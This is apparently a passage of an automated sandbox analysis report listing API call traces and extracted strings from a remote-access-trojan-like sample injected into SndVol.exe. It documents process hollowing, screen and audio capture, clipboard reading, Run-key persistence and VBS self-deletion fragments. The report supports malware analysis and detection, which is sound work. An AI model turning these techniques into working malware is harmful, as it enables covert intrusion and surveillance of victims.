                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                  • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                                                  • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                  • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0491A73C
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0491A746
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0491A753
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                  • Instruction ID: b336d78ad92822289cd784487db69a3cd5d0e40b76075b4379c5eb21bd187385
                                                                  • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                  • Instruction Fuzzy Hash: D631C67590122C9BDB21DF64D9887CDBBB8BF48320F5041EAE81CA7260E7709F858F45
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,0044078B,?), ref: 004407D6
                                                                  • TerminateProcess.KERNEL32(00000000,?,0044078B,?), ref: 004407DD
                                                                  • ExitProcess.KERNEL32 ref: 004407EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                  • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                                                  • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                  • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002,00000000), ref: 0492156E
                                                                  • TerminateProcess.KERNEL32(00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002,00000000), ref: 04921575
                                                                  • ExitProcess.KERNEL32 ref: 04921587
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                  • Instruction ID: b44eb07eb5ba6ac15c2b0743794de7eeb92d90aecd91861eb75a2c86c5336655
                                                                  • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                  • Instruction Fuzzy Hash: 22E0B631400A58AFCF517F64DE4AE983B79EB80296F4144B4F9068B536CB35E962CB44
                                                                  APIs
                                                                  • OpenClipboard.USER32(00000000), ref: 0040A65D
                                                                  • GetClipboardData.USER32(0000000D), ref: 0040A669
                                                                  • CloseClipboard.USER32 ref: 0040A671
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Clipboard$CloseDataOpen
                                                                  • String ID:
                                                                  • API String ID: 2058664381-0
                                                                  • Opcode ID: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
                                                                  • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                                                  • Opcode Fuzzy Hash: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
                                                                  • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID: P@
                                                                  • API String ID: 2325560087-676759640
                                                                  • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                  • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                                                  • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                  • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 048FB5F9
                                                                    • Part of subcall function 048F2EF7: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 048F2F06
                                                                    • Part of subcall function 048F2EF7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,048F311D,?,00000000), ref: 048F2F2E
                                                                    • Part of subcall function 048F2EF7: RegCloseKey.ADVAPI32(00000000,?,?,?,048F311D,?,00000000), ref: 048F2F39
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                  • String ID: Control Panel\Desktop
                                                                  • API String ID: 4127273184-27424756
                                                                  • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                                                  • Instruction ID: c6e736c06e85b246997185b518e5c435ee12bc25b6d78e2faa1e86b2e15bf0ec
                                                                  • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                                                  • Instruction Fuzzy Hash: 1311A562F8025033E914343E8D27F6E280A974BB50F940B5AE7026B6C5F8EB7B5553CB
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                  • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                                                  • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00432908,049133C7), ref: 04913699
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                  • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                                                  • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                                                  • ResumeThread.KERNEL32(?), ref: 00416773
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                                                  • GetLastError.KERNEL32 ref: 004167B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`ou$ntdll
                                                                  • API String ID: 4188446516-1235647125
                                                                  • Opcode ID: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                  • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                                                  • Opcode Fuzzy Hash: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                  • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                                                  APIs
                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                                    • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                                                  • DeleteDC.GDI32(00000000), ref: 00416F32
                                                                  • DeleteDC.GDI32(00000000), ref: 00416F35
                                                                  • DeleteObject.GDI32(00000000), ref: 00416F38
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                                                  • DeleteDC.GDI32(00000000), ref: 00416F6A
                                                                  • DeleteDC.GDI32(00000000), ref: 00416F6D
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                                                  • GetIconInfo.USER32(?,?), ref: 00416FC5
                                                                  • DeleteObject.GDI32(?), ref: 00416FF4
                                                                  • DeleteObject.GDI32(?), ref: 00417001
                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                                                  • DeleteDC.GDI32(?), ref: 0041713C
                                                                  • DeleteDC.GDI32(00000000), ref: 0041713F
                                                                  • DeleteObject.GDI32(00000000), ref: 00417142
                                                                  • GlobalFree.KERNEL32(?), ref: 0041714D
                                                                  • DeleteObject.GDI32(00000000), ref: 00417201
                                                                  • GlobalFree.KERNEL32(?), ref: 00417208
                                                                  • DeleteDC.GDI32(?), ref: 00417218
                                                                  • DeleteDC.GDI32(00000000), ref: 00417223
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                  • String ID: DISPLAY
                                                                  • API String ID: 479521175-865373369
                                                                  • Opcode ID: f4872e5e54956cb8a82cf9cfbe48a4ffd8cadd88bec2254309271a8e236c435d
                                                                  • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                                                  • Opcode Fuzzy Hash: f4872e5e54956cb8a82cf9cfbe48a4ffd8cadd88bec2254309271a8e236c435d
                                                                  • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                                                  APIs
                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                    • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                    • Part of subcall function 0041A17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                                                  • ExitProcess.KERNEL32 ref: 0040C389
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                                                  • API String ID: 1861856835-1953526029
                                                                  • Opcode ID: e03d85ccb791e37cf9ee936b8ea97052e8162eb2640545ba89796c3e5a5ffdfc
                                                                  • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                                                  • Opcode Fuzzy Hash: e03d85ccb791e37cf9ee936b8ea97052e8162eb2640545ba89796c3e5a5ffdfc
                                                                  • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                                                  APIs
                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                                                  • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                                    • Part of subcall function 0041A17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                                                  • Sleep.KERNEL32(000001F4), ref: 004110E7
                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00411114
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                  • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                                                  • API String ID: 2649220323-71629269
                                                                  • Opcode ID: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
                                                                  • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                                                  • Opcode Fuzzy Hash: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
                                                                  • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 0040B882
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                                                  • _wcslen.LIBCMT ref: 0040B968
                                                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000), ref: 0040B9E0
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                                                  • _wcslen.LIBCMT ref: 0040BA25
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                                                  • ExitProcess.KERNEL32 ref: 0040BC36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                                  • String ID: """, 0$6$C:\Windows\SysWOW64\SndVol.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                                                  • API String ID: 2743683619-3732349345
                                                                  • Opcode ID: f87a18f2027e9c8a5bd836a64d924950c6696084ec6eab3a6acea56cc96b6069
                                                                  • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                                                  • Opcode Fuzzy Hash: f87a18f2027e9c8a5bd836a64d924950c6696084ec6eab3a6acea56cc96b6069
                                                                  • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                                                  APIs
                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                    • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,756F3530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                                                  • ExitProcess.KERNEL32 ref: 0040BFD7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                  • String ID: ")$.vbs$05ou`ou$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                  • API String ID: 3797177996-1694455850
                                                                  • Opcode ID: 521aa4a3e546d1a4d3419418fe6985cfdd2c175cfdb62105b2479dc31bcbb342
                                                                  • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                                                  • Opcode Fuzzy Hash: 521aa4a3e546d1a4d3419418fe6985cfdd2c175cfdb62105b2479dc31bcbb342
                                                                  • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                                                  APIs
                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                                                  • SetEvent.KERNEL32 ref: 004191CF
                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                                                  • CloseHandle.KERNEL32 ref: 004191F0
                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                  • API String ID: 738084811-1354618412
                                                                  • Opcode ID: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
                                                                  • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                                                  • Opcode Fuzzy Hash: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
                                                                  • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                                                  • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                                                  • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
